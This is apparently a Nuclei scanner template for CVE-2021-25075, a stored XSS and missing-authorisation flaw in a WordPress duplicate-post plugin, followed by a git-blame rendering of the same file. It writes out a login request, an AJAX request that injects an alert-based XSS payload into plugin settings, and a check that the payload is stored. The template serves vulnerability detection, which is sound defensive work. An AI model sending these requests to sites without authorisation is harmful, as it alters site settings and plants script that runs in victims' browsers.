nuclei-templates/cves/2021/CVE-2021-25075.yaml

id: CVE-2021-25075

info:
  name: WordPress Duplicate Page or Post < 1.5.1 - Stored XSS
  author: DhiyaneshDK
  severity: low
  description: |
    The plugin does not have any authorisation and has a flawed CSRF check in the wpdevart_duplicate_post_parametrs_save_in_db AJAX action, allowing any authenticated users, such as subscriber to call it and change the plugin's settings, or perform such attack via CSRF. Furthermore, due to the lack of escaping, this could lead to Stored Cross-Site Scripting issues.
  remediation: Fixed in version 1.5.1.
  reference:
    - https://wpscan.com/vulnerability/db5a0431-af4d-45b7-be4e-36b6c90a601b
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25075
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N
    cvss-score: 3.50
    cve-id: CVE-2021-25075
    cwe-id: CWE-862
  tags: cve,cve2021,wordpress,xss,wp-plugin,authenticated

requests:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Origin: {{RootURL}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: wordpress_test_cookie=WP%20Cookie%20check

        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1

      - |
        POST /wp-admin/admin-ajax.php?action=wprss_fetch_items_row_action HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: wordpress_test_cookie=WP%20Cookie%20check

        action=wpdevart_duplicate_post_parametrs_save_in_db&title_prefix=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28%2fXSS%2f%29+p

      - |
        GET /wp-admin/admin.php?page=wpda_duplicate_post_menu HTTP/1.1
        Host: {{Hostname}}

    cookie-reuse: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "style=animation-name:rotation onanimationstart=alert(/XSS/) p"
          - "toplevel_page_wpda_duplicate_post_menu"
        condition: and

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
Authenticated Wordpress XSS Templates (#4398) * Create CVE-2021-25075.yaml * Create seo-redirection-xss.yaml 2022-05-14 23:02:53 +00:00			`id: CVE-2021-25075`

			`info:`
minor matcher update 2022-05-14 23:18:52 +00:00			`name: WordPress Duplicate Page or Post < 1.5.1 - Stored XSS`
Authenticated Wordpress XSS Templates (#4398) * Create CVE-2021-25075.yaml * Create seo-redirection-xss.yaml 2022-05-14 23:02:53 +00:00			`author: DhiyaneshDK`
Auto Generated CVE annotations [Sat May 14 23:03:15 UTC 2022] :robot: 2022-05-14 23:03:15 +00:00			`severity: low`
Authenticated Wordpress XSS Templates (#4398) * Create CVE-2021-25075.yaml * Create seo-redirection-xss.yaml 2022-05-14 23:02:53 +00:00			`description: \|`
			`The plugin does not have any authorisation and has a flawed CSRF check in the wpdevart_duplicate_post_parametrs_save_in_db AJAX action, allowing any authenticated users, such as subscriber to call it and change the plugin's settings, or perform such attack via CSRF. Furthermore, due to the lack of escaping, this could lead to Stored Cross-Site Scripting issues.`
			`remediation: Fixed in version 1.5.1.`
			`reference:`
			`- https://wpscan.com/vulnerability/db5a0431-af4d-45b7-be4e-36b6c90a601b`
			`- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25075`
Auto Generated CVE annotations [Sat May 14 23:03:15 UTC 2022] :robot: 2022-05-14 23:03:15 +00:00			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N`
			`cvss-score: 3.50`
			`cve-id: CVE-2021-25075`
			`cwe-id: CWE-862`
minor matcher update 2022-05-14 23:18:52 +00:00			`tags: cve,cve2021,wordpress,xss,wp-plugin,authenticated`
Authenticated Wordpress XSS Templates (#4398) * Create CVE-2021-25075.yaml * Create seo-redirection-xss.yaml 2022-05-14 23:02:53 +00:00
			`requests:`
			`- raw:`
			`- \|`
			`POST /wp-login.php HTTP/1.1`
			`Host: {{Hostname}}`
			`Origin: {{RootURL}}`
			`Content-Type: application/x-www-form-urlencoded`
			`Cookie: wordpress_test_cookie=WP%20Cookie%20check`

			`log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1`

			`- \|`
			`POST /wp-admin/admin-ajax.php?action=wprss_fetch_items_row_action HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`
			`Cookie: wordpress_test_cookie=WP%20Cookie%20check`

			`action=wpdevart_duplicate_post_parametrs_save_in_db&title_prefix=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28%2fXSS%2f%29+p`

			`- \|`
			`GET /wp-admin/admin.php?page=wpda_duplicate_post_menu HTTP/1.1`
			`Host: {{Hostname}}`

			`cookie-reuse: true`
			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`part: body`
			`words:`
			`- "style=animation-name:rotation onanimationstart=alert(/XSS/) p"`
			`- "toplevel_page_wpda_duplicate_post_menu"`
minor matcher update 2022-05-14 23:18:52 +00:00			`condition: and`
Authenticated Wordpress XSS Templates (#4398) * Create CVE-2021-25075.yaml * Create seo-redirection-xss.yaml 2022-05-14 23:02:53 +00:00
			`- type: word`
			`part: header`
			`words:`
			`- text/html`

			`- type: status`
			`status:`
			`- 200`